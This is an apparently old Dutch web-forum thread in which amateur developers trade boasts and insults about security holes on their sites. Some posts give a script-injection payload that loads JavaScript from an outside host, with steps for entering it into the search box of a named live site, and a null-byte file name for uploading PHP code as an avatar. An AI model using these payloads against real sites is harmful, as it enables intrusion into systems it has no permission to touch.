Citaat van Alex

Nou Terror,
ik weet van mezelf dat als ik me verveel dat ik erachter ga zoeken, en soms, als ik de eigenaar van die site ken (waar bv. criminolz opdraait) maar er niets van moet hebben het misschien tegen hem gebruik :p

- Met welke beveiligings fouten was jij bekend?
sql injections, xss en bruteforce
- Hoe voorkom jij dit?
zoveel mogelijk valideren, soms wel overdreven..
- Wat is je ondernomen actie?
functies zoals mysql_real_escape_strig en htmlentities
- Heb jij je coding aangepast na dit bericht?
nog niet, ben het wel van plan

Toon Meer

Zozo jij hebt veel verstand, 1 week terug op je websiteje scriptingstart vond ik al 4 basis beveiligingslekken in 1 minuut, terwijl je vriendje melvin zo trots over jullie skills zat te praten dat jullie elke site kunnen hacken etc en dat het mij niet zou lukken een lek te vinden op jullie site. maar geluk met je vaardigheden.

GEEN BAN, DIT IS ENKEL DAT IE NIET MOET OPSCHEPPEN.

Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.

Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).

Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl

Soms kun je php files uploaden als avatar ofzo met de naam

avatar.php%00.jpg

het script denkt dat ie jpg upload, maar je kan het bestand vervolgens openen in php.

Citaat van interneppers

Een aangezien het hier gaat over Beveiligingslekken, zal ik hier ook gelijk reageren.

Was het jullie al bekend dat deze website ook lek is? XSS is mogelijk hier en daar (drie dubbele addslashes maakt niets uit 8-|).

Beheerder kan een mailtje sturen naar info @ naam die ik heb opgegeven en daarachter .nl

Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.

Je server beveiligen op nieuwste update's soms zijn er zo 0-day exploits uit.

Citaat van Niels

Bijzonder uhm.. triest. Sowieso heeft xss niks weinig te maken met slashes he. Alleen als je gebruik wilt maken van javascript, html tags kunnen opzich welzonder quotes dus.

Lol. Je hebt helemaal geen quotes nodig om een script te injecteren.... Zie onderstaande

interneppers
Ik weet niet uit welk hol jij bent gekropen maar kijk dit eens:

Citaat

... html tags kunnen opzich welzonder quotes dus.

Dit komt dus uit me vorige reactie.

Maargoed een screenshot doet me ook verdomd weinig eigenlijk, het kan net zo goed realtime geedit zijn aangezien je de web developers add on ook hebt.

Tevens ben je wel heel triest om te denken dat dit werkt:

"><script src=http://hackclub.nl/xss.js></script>

Niels, ben jij serieus? Wat ben jij triest zeg. Geef mij 1 goede reden om te geloven dat die code niet zou kunnen werken?

Weet je wat, doe het zelf anders? Bij zoeken voer je bovenstaande code uit. Dan zie je het vanzelf

URL: http://www.criminalspoint.com/zoeken.html
ZOEKTERM:

Citaat

"><script src=http://hackclub.nl/xss.js></script>

ENTER DRUKKEN

Kan het nog duidelijker? Elite-member? Lol. Laat me niet lachen.

Cheers :cheer:

PS. Wanneer gaan die graftiefus addslashes eens weg?

Citaat van Niels

interneppers
Ik weet niet uit welk hol jij bent gekropen maar kijk dit eens:

Dit komt dus uit me vorige reactie.

Maargoed een screenshot doet me ook verdomd weinig eigenlijk, het kan net zo goed realtime geedit zijn aangezien je de web developers add on ook hebt.

Tevens ben je wel heel triest om te denken dat dit werkt:

PHP

"><script src=http://hackclub.nl/xss.js></script>

het werk ook daadwerkelijk, is gewoon een bestandje om te kijken of t is beveiligd:P:P

Goh dat wist ik nog niet zeg. Weer wat geleerd.
Denk je nou werkelijk dat ik die basis pruttel waar jullie lekker mee knooien niet ken of vroeger mee gewerkt heb ?

Bouw dan de Twitter malware javascrpt om ofzo als je toch zo goed bent. (dit is dan weer tegen interneppers met zijn xss beveiliging voor 20 euro wat nooit zou uitkunnen voor iemand met verstand van zake)

Citaat van Niels

Goh dat wist ik nog niet zeg. Weer wat geleerd.
Denk je nou werkelijk dat ik die basis pruttel waar jullie lekker mee knooien niet ken of vroeger mee gewerkt heb ?

Bouw dan de Twitter malware javascrpt om ofzo als je toch zo goed bent. (dit is dan weer tegen interneppers met zijn xss beveiliging voor 20 euro wat nooit zou uitkunnen voor iemand met verstand van zake)

tis denk niet eens een lek, want r staat een bestand op de server die je kan aanroepen, waarschijnlijk heeft koen dat r in gezet, tell me i'm wrong

Citaat van deathkill

tis denk niet eens een lek, want r staat een bestand op de server die je kan aanroepen, waarschijnlijk heeft koen dat r in gezet, tell me i'm wrong

Nee de fout heeft te maken met het feit dat html tekst niet naar plain worden opgezet. Maar inderdaad we kunnen koen de schuld geven

zoals altijd:P ben nu bezig met een source, weet iemand hoe je inputs beveiligd(de mogelijkheden)?

Citaat van deathkill

zoals altijd:P ben nu bezig met een source, weet iemand hoe je inputs beveiligd(de mogelijkheden)?

Door form validation misschien? Google eerst eens.

had al wel 1 en t ander gezocht, maar mischien dat r onbekende form validation functies zijn